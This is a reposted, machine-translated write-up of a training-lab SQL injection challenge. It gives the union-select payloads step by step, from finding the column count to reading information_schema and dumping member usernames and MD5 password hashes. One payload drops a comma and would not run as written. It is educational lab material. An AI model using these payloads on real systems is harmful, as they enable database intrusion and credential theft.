当前位置:网站首页>Mozi college SQL injection solution
Mozi college SQL injection solution
2020-11-08 09:40:00 【osc_7bgz0no1】
One · Judgment injection
Input id=1, Normal return . Input id=-1 Returns an error . from This shows that there is injection .
Two · Judgment fields
URL id=-1 order by 1
URL id=-1 order by 2
URL id=-1 order by 3
URL id=-1 order by 4
URL id=-1 order by 5 An error at this time , The description has four fields
3、 ... and · Use union Query injection point
Input union select 1,2,3,4
Find out 2,3 For the obvious note point
Four · Use database() Chaku name
Input union select 1,database(),3,4
Find out the name of the library mozhe_Discuz_StormGroup
5、 ... and · Look up the name of the table
Input
union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema=‘mozhe_Discuz_StormGroup’
Query to StormGroup_member,notice
See member, So doubt about the first one . So first look up the first .
6、 ... and · Inquire about StormGroup_member The fields stored in the
Input
union select 1,group_concat(column_name)3,4 from information_schema.columns where table_name=‘StormGroup_member’
Query out id,name,password,status
7、 ... and · Query password and user name
union select 1,group_concat(name,0x3a,password),3,4 from StormGroup_member
obtain md5 Encrypted value . To decrypt , Get the code .
If the password is wrong , adopt limit m,n To continue with the inquiry .
8、 ... and · Submit key
After getting the password, you can see key, Copy , Submit .
版权声明
本文为[osc_7bgz0no1]所创,转载请带上原文链接,感谢
边栏推荐
- 什么你的电脑太渣?这几招包你搞定! (Win10优化教程)
- Do you really understand the high concurrency?
- OSChina 周日乱弹 —— 之前呢,我一直以为自己是个……
- 将“光头”识别为“足球”,AI 摄像头如何犯的错?
- FORTRAN77从文件中读入若干数据并用heron迭代公式开方
- 成功解决An error ocurred while starting the kernel
- [data structure Python description] use hash table to manually implement a dictionary class based on Python interpreter
- Six key points of data science interview
- Spotify是如何推动数据驱动决策的?
- 5g/4g工业无线路由器
猜你喜欢
The most detailed usage guide for perconaxtradbcluster8.0
Unparseable date: 'mon Aug 15 11:24:39 CST 2016', time format conversion exception
Visual Studio 2015 未响应/已停止工作的问题解决
Astra: Apache Cassandra的未来是云原生
Oops, the system is under attack again
仅用六种字符来完成Hello World,你能做到吗?
解决RabbitMQ消息丢失与重复消费问题
Sum up some useful functions
5g + Ar out of the circle, China Mobile Migu becomes the whole process strategic partner of the 33rd China Film Golden Rooster Award
蓝牙2.4G产品日本MIC认证的测试要求
随机推荐
The difference between vivoy 73s and glory 30 Youth Edition
VC++指定目录下文件按时间排序输出
vivoY73s和vivoY70s的区别 vivoY73s和vivoY70s哪个值得入手
How can a technician take over a complex system?
Visual Studio 2015 未响应/已停止工作的问题解决
双向LSTM在时间序列异常值检测的应用
麦格理银行借助DataStax Enterprise (DSE) 驱动数字化转型
Rust:命令行参数与环境变量操作
ASP.NET A complete solution based on exception handling in MVC
vivoS7e和vivoS7的区别 哪个更值得入手
Adobe Prelude /Pl 2020软件安装包(附安装教程)
Is blazor ready to serve the enterprise?
进程、线程和协程的区别
数据科学面试应关注的6个要点
FORTRAN77从文件中读入若干数据并用heron迭代公式开方
Swiper window width changes, page width height changes lead to automatic sliding solution
5G+AR出圈,中国移动咪咕成第33届中国电影金鸡奖全程战略合作伙伴
python_scrapy_房天下
5g/4g工业无线路由器
Sum up some useful functions